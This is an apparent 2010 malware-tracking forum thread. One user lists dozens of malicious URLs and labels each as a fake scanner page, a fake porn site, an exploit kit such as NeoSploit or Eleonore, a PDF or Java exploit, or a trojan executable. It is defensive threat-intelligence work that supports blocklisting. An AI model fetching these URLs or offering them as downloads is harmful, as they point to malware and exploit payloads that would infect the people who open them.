Malware Domain List

Malware Related => Malicious Domains => Topic started by: lelenina on June 13, 2010, 05:09:16 pm

Title: Malicious Domains by Lelenina
Post by: lelenina on June 13, 2010, 05:09:16 pm
Code: [Select]
http://memory-scanner.com
Fake Scanner Page
Code: [Select]
http://scanner-models.com
Fake Scanner Page
Code: [Select]
http://globalwarmingtray.info/nc12/index.php?ID=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 13, 2010, 10:42:57 pm
Code: [Select]
http://justatube.com
Fake Porn Site
Code: [Select]
http://real-tube.org
Fake Porn Site
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 14, 2010, 01:58:36 am
Code: [Select]
http://baronessan.se/.9k7ea/?getexe=se1ws.exe
Koobface
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 16, 2010, 07:31:43 pm
Code: [Select]
http://ohh.please-unblock-me.com/?oazagezitv
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 17, 2010, 10:32:47 pm
Code: [Select]
http://scanner-glass.com
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 19, 2010, 04:38:49 pm
Code: [Select]
http://scanner-manufacturer.com
Fake Scanner Page
Code: [Select]
http://scanner-glass.com
Fake Scanner Page
Code: [Select]
http://code-scanner.com
Fake Scanner Page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 21, 2010, 09:05:09 pm
Code: [Select]
http://laser-copier.com
Fake Scanner Page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on June 29, 2010, 05:08:52 am
Code: [Select]
http://rmets.biz/cgi-bin/cn.aspx?ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU5EZzFPVFl3T0RVaU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8xT2lJek5qWTJPU0k3Y3pvME9pSnJjSEJwSWp0ek9qTTZJams1T1NJN2ZYTTZNem9pYldRMUlqdHpPak15T2lJek9EZ3daV0pqTldJME9USTNOVE5qTlRZMk56azJPREkzTURJeE9URTJOeUk3ZlE9PQ%3D%3D/s00a106201317r0409Xf1646355Ybd4d7a0fZ0100f080
NeoSploit
Code: [Select]
http:///fairscansecurity.com
Fake Scanner Page
Code: [Select]
http://cheapscansecurity.com/
Fake Scanner Page
Code: [Select]
http://burnscansecurity.com/
Fake Scanner Page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 01, 2010, 04:06:35 am
Code: [Select]
http://best-scanner-2010.com/
Fake Scanner Page
Code: [Select]
http://mega-scan-pc-new14.net/?code=1500
Fake Scanner Page
Code: [Select]
http://mugyra.org/sutra/in.cgi?15=&ID=1
Redirects to Fake Vimes
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 01, 2010, 06:51:19 am
Code: [Select]
http://super-tubes-mego.com/xplay.php?id=45230
http://member-tube.com/xplay.php?id=40081
http://clear-web-tube.com/xplay.php?id=40081
http://modern-tube.net/xplay.php?id=45230
http://Last-sex-tube.com
http://best-tube-world.com/xplay.php?id=40081
http://sunny-tube-house.com/xplay.php?id=45043
http://super-cool-tube.net/xplay.php?id=45284
http://suoer-mego-tubes.com/xplay.php?id=40081
http://clear-great-tube.com/xplay.php?id=45284
All of them are fake porn sites.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 02, 2010, 01:15:11 am
Code: [Select]
http://www3.epic10.co.cc/?p=p52dcWltbV%2FRlsijZFahqJ51nF6ZZGSdkZzHlGk%3D
Redirects to fake scanner page
Code: [Select]
http://www2.sunclear.co.cc/?p=p52dcWltbV%2FCj8bYboN6dYhe0KCfYWCcU9LXoKitaVzHysd2lJN%2Fel6orKWeZZWdZWRkmGublWWIo6THodjXoFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1mmaQYWKaW5Scm19oY2qL08ifb1qtp3VlanCZXZeZYmJjWqarlmqTYmeeXZaXlGNtWJnInriMWKuimHVsams%3D
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 03, 2010, 06:12:48 am
Code: [Select]
http://ultimatewide.in/4/getexe.php?spl=mdac
Insain trojan
Code: [Select]
http://gromalines.pl.ua/grad/222/ya.php
Redirects to fake scanner page
Code: [Select]
http://highsecurityscan.com
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 04, 2010, 03:36:52 am
Code: [Select]
http://hotsecurityscan.com
fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 05, 2010, 03:24:25 am
Code: [Select]
http://www4.omgomg9.co.cc/?p=p52dcWltbV%2FRlsijZFahqJ51nV7DZJadk5zHmJI%3D
Redirects to fake scanner page
Code: [Select]
http://www1.truefind44p.co.cc/?p=p52dcWltbV%2FCj8bYboN6dYhe0KCfYWCcU9LXoKitaVzHysd2lJN%2Fel6orKWeZpXHZZZkmmubmY6Io6THodjXoFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1mmaQYWKaW5Scm19oY2qL08ifb1qtp3VlanCZX52faWVjWqarlmqTYmeeX5ydm2ZtWJnInriMWKuimHVsams%3D
Fake scanner page
Code: [Select]
http://opensecurityscan.com/
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 05, 2010, 05:45:14 am
Code: [Select]
http://ad.googleanaliticks.com/info/u2.html/s002106204317r0409Rabff69a9Xbba2610cY3b3f5a86Z0100f060
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 05, 2010, 06:54:54 am
Code: [Select]
http://dasafa.info/page/new.php/s002106201317r0409Ra38dbe4fX865af0a8Yca6a16c0Z0100f080
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 06, 2010, 06:03:45 pm
Code: [Select]
http://new-tube-fest.com/xplays.php?id=45031
fake movie site
Code: [Select]
http://designnewmedia.com/video-plugin.45031.exe
fake codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 08, 2010, 09:49:44 pm
Code: [Select]
http://billivilli.co.cc/bilvil/nc111/nc.php?uid=2114&pid=3
Redirects to fake scanner page
Code: [Select]
http://sendyourtraffic41.org/elka/404.php
Redirects to fake scanner page
Code: [Select]
http://best-online2.com/tds_privatcoin_go1.php?ID=100000
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 08, 2010, 10:20:59 pm
Code: [Select]
http://rheal.biz/cgi-bin/cn.aspx?ID=100000
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 09, 2010, 07:02:59 am
Code: [Select]
http://huyqvpeotwyn.com/tre/sena.py
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 09, 2010, 07:08:27 am
Code: [Select]
http://digitalmediasonic.com/video-plugin.45031.exe
Fake codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 09, 2010, 07:17:49 pm
Code: [Select]
http://superupdates.com/video-plugin.45031.exe
Fake codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 10, 2010, 02:58:13 am
Code: [Select]
http://dotroot.tk/1.php?ID=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 10, 2010, 08:03:25 am
Code: [Select]
http://b23.ru/e1ij
Facebook phisher
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 11, 2010, 03:04:07 am
Code: [Select]
http://4info-tools.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 11, 2010, 06:09:33 am
Code: [Select]
http://freemovieswww.info/player_update/divx_fix_patch.exe
Trojan TDSS
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 02:54:03 am
Code: [Select]
http://parkinssu.info/hb/
Fake Scanner Page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 06:20:43 am
Code: [Select]
http://mediapromedia.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 10:28:44 pm
Code: [Select]
http://caazzaport.co.cc/caaza/go.php?sid=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 10:29:58 pm
Code: [Select]
http://yastatic.co.cc/333/ya.php
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 12, 2010, 10:57:54 pm
Code: [Select]
http://rmetsih.biz/cgi-bin/cn.aspx?ID=1
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 12:09:30 am
Code: [Select]
http://dvdmusicinfo.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 02:44:51 am
Code: [Select]
http://everytds.tk/in.cgi?3=&ID=1
Redirects to fake porn site
Code: [Select]
http://vogel-tube.com/xfreeporn.php?id=45309
Fake porn site
Code: [Select]
http://digitalmediaset.com/video-plugin.45309.exe
Trojan
Code: [Select]
http://digitalmediaset.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 02:50:21 am
Code: [Select]
http://onlyscan.tk/goo/oCi8j.pdf
Pdf exploit I believe it installs Defense Center
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 03:02:10 am
Code: [Select]
http://onlyscan.tk/goo/zCue.class
Exploit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 07:35:20 am
Code: [Select]
http://digitalpackback.com/New-Video-Addon.48665.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 07:11:05 pm
Code: [Select]
http://electronicbankdata.com/video-plugin.45309.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 15, 2010, 07:33:54 pm
Code: [Select]
http://www3.doligz39td.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3JXsiYlWmdYmiaxA%3D%3D
Redirects to fake scanner page
Code: [Select]
http://www2.yourprotection86.co.cc/?p=p52dcWplanKHjsbIo22AgXOOipnVbWGWY4nT1m6uqG2Lw8ydb5aYen5arK3NaseXlmRfbJholmLFVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooWObXmGYYZGVm2llY2eZh9WemHFfqKtxaWuYZpaYY2NeZFis11%2BfYWKdZpWWlWRoYlzIxKCOhVqwnZxxcWyV
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 06:24:06 am
Code: [Select]
http://truestarmedia.com/video-plugin.45309.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 09:04:27 am
Code: [Select]
http://everytds.tk/in.cgi?4=&ID=1
redirects to exploit kit
Code: [Select]
http://dfrscanner.tk/non/index.php
Exploit kit
Code: [Select]
http://dfrscanner.tk/non/um1zi.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 09:26:28 am
Code: [Select]
http://activemedianews.com/video-plugin.45312.exe
Trojan
Code: [Select]
http://mediaservicesdata.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 10:47:05 pm
Code: [Select]
http://globstere.info/gh/
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 10:59:26 pm
Code: [Select]
http://nike1ot2n.com/ab/tmp/pdfopen.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 16, 2010, 11:38:08 pm
Code: [Select]
http://nike1ot2n.com/ab/tmp/m.vbs
the second part of the exploit
Code: [Select]
http://nike1ot2n.com/ab/l.php?i=14
Trojan.Downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 17, 2010, 04:30:37 am
Code: [Select]
http://allxscan.tk/ddt/fVJV.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 18, 2010, 02:40:03 am
Code: [Select]
http://mtravel3biz.com/in.cgi?19=&parameter=porn&mudo=dumd&ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002TmpvaU9EQXlOakUzSWp0ek9qRXlPaUpoWkhabGNuUnBjMlZmYVdRaU8zTTZOam9pTVRFNE16TTBJanR6T2pRNkltdHdjR2tpTzNNNk16b2lPVGs1SWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SWpCbU9UZzBaRE13TURrMVlqRm1aRFE0WWpVMFlXSXlNR0kyT1RobFlqUTNJanQ5
Redirects to exploit kit and fake scanner page?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 18, 2010, 05:16:47 pm
Code: [Select]
http://www.domainnamereg1.in/retn/qb0pfsg/lgut722.php
Java exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 18, 2010, 05:53:53 pm
Code: [Select]
http://92.63.107.10/223/tmp/pdfopen.pdf
Pdf exploit
Code: [Select]
http://92.63.107.10/223/tmp/m.vbs
Second part of the exploit
Code: [Select]
http://92.63.107.10/223/l.php?i=14
Trojan.Downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 18, 2010, 09:46:13 pm
Code: [Select]
http://firstport.in/x/?src=kostes&id=best&o=o&ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002TmpvaU5qRXhPRGt6SWp0ek9qRXlPaUpoWkhabGNuUnBjMlZmYVdRaU8zTTZOam9pTVRJeE1UUTFJanR6T2pRNkltdHdjR2tpTzNNNk16b2lPVGs1SWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SW1Zek9UaGlOV0ppWm1abVpUaGpaRGd6WXpRNVpUTmlOalZoWkRObFpUTXlJanQ5
Directs to exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 19, 2010, 03:20:48 am
Code: [Select]
http://datadigitalonline.com/video-plugin.45031.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 19, 2010, 03:39:01 am
Code: [Select]
http://flashdns.in/x/?src=kostes&id=best&o=o&ID=100000
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 19, 2010, 05:54:44 pm
Code: [Select]
http://fitrst.ignorelist.com/3/?c=11
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 20, 2010, 08:05:53 pm
Code: [Select]
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on July 20, 2010, 08:21:54 pm
Code: [Select]
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)

fake scanner page is a side effect only.

It is a Eleonore exploit kit. Fake scanner url is probably called only if exploits are unsuccessful.
Look at function complete(). I have seen such a combinatiion before.

http://wepawet.cs.ucsb.edu/view.php?hash=8a89f74589ce966cf71a08a4d86e567b&t=1279656448&type=js
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 08:04:23 am
Code: [Select]
http://ntscanner.in/new/index.php?ID=1
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 08:17:21 am
Code: [Select]
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)

fake scanner page is a side effect only.

It is a Eleonore exploit kit. Fake scanner url is probably called only if exploits are unsuccessful.
Look at function complete(). I have seen such a combinatiion before.

http://wepawet.cs.ucsb.edu/view.php?hash=8a89f74589ce966cf71a08a4d86e567b&t=1279656448&type=js
Wepawet really comes in handy when analyzing exploits.  I have that website bookmarked.  Thank you for showing me that. :)
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 07:24:02 pm
Code: [Select]
http://mtravel3biz.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://stifast31.info/bv/
Fake scanner page
Code: [Select]
http://bereto8ns.com/zbb/index.php
Exploit kit
Code: [Select]
http://superflashplayer.com/video-plugin.45031.exe
Trojan
Code: [Select]
http://theflashclub.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 10:53:08 pm
Code: [Select]
http://super-fresh-tube.com/xfreeporn.php?id=45309
Fake porn site
Code: [Select]
http://mediafirstsystems.com/video-plugin.45309.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 22, 2010, 11:30:08 pm
Code: [Select]
http://tdsinfo.tk/in.cgi?3=&ID=10000
exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 23, 2010, 08:04:56 am
Code: [Select]
http://netmediaforum.com/video-plugin.45309.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 23, 2010, 11:11:11 pm
Code: [Select]
http://lcitsih.biz/index.php?ID=1
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 23, 2010, 11:19:46 pm
Code: [Select]
http://nimtsih.biz/l.php?i=2
Trojan.Dropper
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 24, 2010, 09:02:09 am
Code: [Select]
http://adobeflash-ver16.co.tv/zxce/install_adobe_flash.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 24, 2010, 07:52:41 pm
Code: [Select]
http://zsitsih.biz/index.php?ID=1
Exploit kit
Code: [Select]
http://nimtsih.biz/l.php?i=2
Trojan.Dropper
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 24, 2010, 08:43:47 pm
Code: [Select]
http://dandbcorporation.com/l.php?i=14
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 24, 2010, 10:19:38 pm
Code: [Select]
http://awrinc.net/style/images/go.php?sid=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 25, 2010, 05:06:47 am
Code: [Select]
http://bellday.ru:8080/index.php?pid=10
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 28, 2010, 04:31:11 am
Code: [Select]
http://illinated.co.in/index.php?ID=1
Exploit kit
Code: [Select]
http://illinated.co.in/tmp/libtiff.pdf
Pdf exploit
Code: [Select]
http://illinated.co.in/l.php?i=14
Trojan.Downloader
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 28, 2010, 08:42:50 am
Code: [Select]
http://scripttoscan.co.cc/installer.0042.exe
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 28, 2010, 08:34:46 pm
Code: [Select]
http://www3.trust-av41.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXsiYk2mbY5udkQ%3D%3D
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 29, 2010, 03:43:45 am
Code: [Select]
http://averagedaddy.com/?showc=vindictus
Redirects to fake scanner page?  According to Norton Safeweb.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 29, 2010, 06:56:46 am
Code: [Select]
http://213.155.29.144/news/l.php?deserialize=1b&i=
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 29, 2010, 08:31:06 am
Code: [Select]
http://temptrouble.in/4/index.php
Exploit kit
Code: [Select]
http://temptrouble.in/4/getexe.php?spl=mdac
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 30, 2010, 01:33:26 am
Code: [Select]
http://allvexxx.tk/1/index.php
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 30, 2010, 11:15:10 pm
Code: [Select]
http://avadrom.co.in/index.php?ID=1
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 31, 2010, 05:03:54 am
Code: [Select]
http://red-xxx-tube.net/cgi-bin/setuppatch.pl?adv=1481
Trojan
Code: [Select]
http://capdataservice.com/New-Video-Addon.48577.exe
Trojan
Code: [Select]
http://hotxtubeonline.com/mov524/movie.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 31, 2010, 08:58:36 am
Code: [Select]
http://11.wenmo.in/x/index.php?s=036cb76056fdbc21df981dec95f43cb6
Exploit kit
Code: [Select]
http://11.wenmo.in/x/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on July 31, 2010, 10:32:25 pm
Code: [Select]
http://allmediavision.com/New-Video-Addon.48440.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 03:57:32 pm
Code: [Select]
http://bestdatawork.com/video-plugin.45035.exe
Trojan
Code: [Select]
http://filesserveronline.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 04:17:59 pm
Code: [Select]
http://psoriasisinstruction.com/wp-content/43/sexy-bodies.html
Java on screen popup leads to fake codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 05:13:07 pm
Code: [Select]
http://video39-tube.servepics.com/video.php?l=6:09&id=1&n=teen&a=nEcroS&path=./tmb/teen/03.jpg&rat=./img/rating5.jpg&v=20750
Leads to fake AV disguised as a codec
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 05:15:11 pm
Code: [Select]
http://tube-hosting270.sytes.net/getfile95666/flash_player_installer.exe
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 06:16:43 pm
Code: [Select]
http://videos90-host.redirectme.net/download-id72929/flash_player_installer.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 07:35:44 pm
Code: [Select]
http://videos90-flash.3utilities.com/?n=teen&id=1
Leads to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 07:37:22 pm
Code: [Select]
http://tube62-host.sytes.net/?n=teen&id=1
Leads to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 10:15:51 pm
Code: [Select]
http://flash36-videos.redirectme.net/?n=teen&id=1
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 01, 2010, 11:42:08 pm
Code: [Select]
http://video96-pics.servehttp.com/?n=teen&id=1
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 04:50:47 pm
Code: [Select]
http://02.acani.in/x/index.php
Exploit kit
Code: [Select]
http://02.acani.in/x/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 05:06:47 pm
Code: [Select]
http://websmeter.com/new/index.php
Exploit kit
Code: [Select]
http://websmeter.com/new/load.php?f=1&e=4
Trojan Iflar
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 08:05:45 pm
Code: [Select]
http://flash33-hosting.servepics.com/?n=teen&id=1
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 08:07:29 pm
Code: [Select]
http://hosting17-video.3utilities.com/?n=teen&id=1
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 10:05:34 pm
Code: [Select]
http://modern-tube.net/xplays.php?id=40030
Directs to trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 10:58:09 pm
Code: [Select]
http://hetupoxiy.cn/chat/bd3225fe436c29ac8474e83d3cd38c08.php?showuser=25329981&showforum=s1
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 02, 2010, 11:34:29 pm
Code: [Select]
http://actdataonline.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 03, 2010, 01:01:46 am
Code: [Select]
http://193.105.174.53/DE/index.php
Exploit kit
Code: [Select]
http://193.105.174.53/DE/l.php?deserialize=e9&i=
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 03, 2010, 01:13:08 am
Code: [Select]
http://ca200dajskjdhd.com/kde/index.php
Exploit kit
Code: [Select]
http://ca200dajskjdhd.com/kde/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 06, 2010, 05:18:33 am
Code: [Select]
http://178.239.48.101/index.php?q=9VGU1G21ML942SE396872SD4HB9H5PB80DX99TMS00203MN3UO4XD4U4Z7PzcpQRhbVTE8VmtbNzlSXmlRU044IU00NlAlUCw%252BDglqaQsNenxrCB4DAQcxf09kMwAkJwJlBWsHNSFnBnRRB3R4XFIAYSALAQNZAAVrJgcrcwE0BGJ6CQBzaQ4JbDk2Q0Q%253D
Fake scanner page
Code: [Select]
http://acer.is-a-geek.net/3/?c=917
Fake scanner page
Code: [Select]
http://digitalartfact.com/New-Video-Addon.48577.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 07, 2010, 12:37:17 am
Code: [Select]
http://bondbm3x.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://mohotwrxst.info/hn
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 07, 2010, 05:26:18 am
Code: [Select]
http://fchfdghfg.tk/new/index.php?ID=1
Exploit kit
Code: [Select]
http://fchfdghfg.tk/new/41fdcb12a4bc143f98999fcda8927ecc.pdf
Pdf exploit
Code: [Select]
http://fchfdghfg.tk/new/load.php?f=1&e=2
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 07, 2010, 08:29:48 pm
Code: [Select]
http://sixpornvideos.in/pornhub/animal-porn-movie.exe
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 08, 2010, 07:09:06 am
Code: [Select]
http://xatechbot.com
Leads to fake codec
Code: [Select]
http://0scene.info
Leads to trojans
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 08, 2010, 10:51:04 pm
Code: [Select]
http://www.hookranger.info/tx/
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 06:54:26 am
Code: [Select]
http://ssdssds.co.cc/x/index.php?s=8b02a28ea6391cdd77172f450ecf4855&ID=1
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 07:03:27 am
Code: [Select]
http://ssdssds.co.cc/x/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 09:06:28 pm
Code: [Select]
http://fastsofon.com/any3/5-direct.ex
Fake AV?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 10:10:09 pm
Code: [Select]
http://www3.real-security83.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3LXpqYnGlvZZeVkQ%3D%3D
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 09, 2010, 10:31:35 pm
Code: [Select]
http://www.searchfertile.com/a/ad
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 10, 2010, 09:53:48 am
Code: [Select]
http://max3wrxstia.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://www.lancergooe.info/yu/
Fake scanner page
Code: [Select]
http://nolewe0ret.com/ab/index.php
Exploit kit
Code: [Select]
http://nolewe0ret.com/ab/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 10, 2010, 08:12:06 pm
Code: [Select]
http://www.offline.pt/template/go.php?sid=1
Redirects to fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 10, 2010, 10:19:59 pm
Code: [Select]
http://datzsdt.co.cc/x/index.php
Exploit kit
Code: [Select]
http://datzsdt.co.cc/x/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 11, 2010, 02:15:33 am
Code: [Select]
http://ppcube.com/in.cgi?8
Redirects to fake porn site and fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 11, 2010, 06:36:54 am
Code: [Select]
http://engsquad.com/?affid=387&subid=landing
Fake scanner page
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 11, 2010, 06:48:00 am
Code: [Select]
http://lilumy3wxt.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://n2lewe1ret.com/ab/index.php
Exploit kit
Code: [Select]
http://n2lewe1ret.com/ab/l.php
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 11, 2010, 07:02:11 pm
Code: [Select]
http://matthall.com.au/properties/index.php
Eleonore Exploit pack version 1.3.2
Code: [Select]
http://matthall.com.au/properties/statss.php?exefile=1
Control panel of Eleonore Exploit pack version 1.3.2
Code: [Select]
http://matthall.com.au/properties/load.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 12, 2010, 10:12:56 pm
Code: [Select]
http://mainstep.in/4/index.php
Exploit kit
Code: [Select]
http://mainstep.in/4/l.php
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on August 13, 2010, 04:46:56 am
Code: [Select]
http://pradolast.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
Code: [Select]
http://mobielast.com/ab/index.php
Exploit kit
Code: [Select]
http://mobielast.com/ab/l.php
Fake AV
Title: Re: Malicious Domains by Lelenina
